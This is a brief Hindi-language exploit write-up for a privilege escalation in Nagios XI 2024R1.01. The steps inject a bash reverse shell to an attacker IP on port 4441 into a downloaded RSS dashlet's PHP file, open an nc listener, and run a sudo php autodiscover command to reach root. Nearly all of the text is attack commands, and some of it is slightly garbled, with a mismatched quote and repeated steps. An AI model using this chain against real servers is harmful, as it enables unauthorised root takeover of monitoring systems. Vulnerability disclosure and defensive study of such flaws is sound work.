
Nagios XI 2024R1.01 के लिए विशेषाधिकार वृद्धि शोषण, जो NAGIOS या APACHE उपयोगकर्ताओं से दुर्भावनापूर्ण RSS डैशलेट इंजेक्शन और sudo कमांड निष्पादन के माध्यम से पूर्ण रूट एक्सेस सक्षम करता है।
CVE द्वारा खोजा गया: K. Wahab (Neo`X)
इस उदाहरण में RSS Dashlet का उपयोग किया गया है।
exec('/bin/bash -i >& /dev/tcp/<Attacker IP>/4441 0>&1);
nc -nlvp 4441
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1
"dashlets" प्रबंधन पृष्ठ पर जाएं और एक Dashlet डाउनलोड करें:
http://TARGET_IP/nagiosxi/admin/dashlets.php?download=rss_dashlet
*.inc.php को संशोधित करें:
exec("sleep 30 && /bin/bash -c '/bin/bash -i >& /dev/tcp/<Attacker IP>/4441 0>&1'");

nc -nlvp 4441
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1
(नोट: कमांड निष्पादित करने के बाद आपको APACHE के रूप में कनेक्शन प्राप्त होगा, बाहर निकलने और कई बार फिर से लिसनर शुरू करने के लिए CTRL+C का उपयोग करें)
